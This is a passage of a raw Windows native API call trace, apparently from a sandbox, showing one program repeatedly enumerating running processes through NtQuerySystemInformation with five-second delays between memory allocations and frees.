Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.442] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.449] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.496] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.504] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.518] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0212.573] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0212.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0212.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0212.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0212.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0212.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 